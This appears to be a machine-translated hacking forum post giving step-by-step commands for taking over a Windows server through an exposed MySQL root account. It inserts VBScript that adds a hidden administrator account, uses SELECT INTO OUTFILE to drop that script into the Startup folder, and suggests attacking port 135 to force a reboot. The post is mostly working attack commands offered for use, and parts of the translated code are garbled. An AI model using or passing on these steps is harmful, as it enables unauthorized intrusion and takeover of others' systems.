The day before yesterday, I sent a post about the mysql user root password, I also found some ways to use this vulnerability, generally writing an ASP or PHP back door, not only trouble, but also guess the website. Directory, if the other party does not open IIS, then we can't help? ?
Later, I thought of a way, and I have successful in several machines I have tested. Now I will announce the following:
1. Connect to the other party mysql server mysql -u root -h 192.168.0.1 mysql.exe This program is installed in the bin directory of MySQL installed 2, let's take a look at what database mysql> show databases; mysql default There will be mysql, Test, two databases when installing, if you see other databases, then the user's self-built database. 3, let us enter the database mysql> use test; we will enter the TEST database 4, see what data tables in the database mysql> show tables; default, there is no table in Test. The following is the key part 5, create a new table under the TEST database; mysql> Create Table A (CMD text); ok, we have created a new table, named A, and only one field is stored in the table, The field name is cmd, for the text text. 6, insert content in the table Mysql> Insert Into a value ("" "wscript.shell =") "); mysql> Insert INTO a VALUES (" a = wshshell.run ("cmd.exe / c net user zjl317 zjl317 / add "", 0) "); mysql> INSERT INTO A VALUES (" b = wshshell.run ("cmd.exe / c net localgroup administrators zjl317 / add" ", 0)") Pay attention to double quotation marks and brackets and "0" behind you! We will use these three commands to create a VBS scriptor! 7, okay, now let's take a look at what mysql> select * from A in Table A; we will see three lines of data in the table, which is what we just entered. After confirming that you entered, let's come To the next step 8, the output table is a script file for a VBS mysql> select * from a Into outfile "C: // Docume ~ 1 // alluse ~ 1 //" Start "menu // Program // Start // a. VBS "; We use the contents of our table to the startup group, is a VBS script file! Note" / "symbol. 9. Seeing this one must know, just use MySQL to output an executable file. Why not use bat, because there is a clear DOS window when starting, and uses the VBS script to completely hide the window and there will be no error tips! Original, there should be a complete script to automatically delete this script, but Chinese The directory is really unable to handle, only the task! Ok, find a tool attack 135 to let the server restart, you will be an administrator after a few minutes.
text
Author: lztei
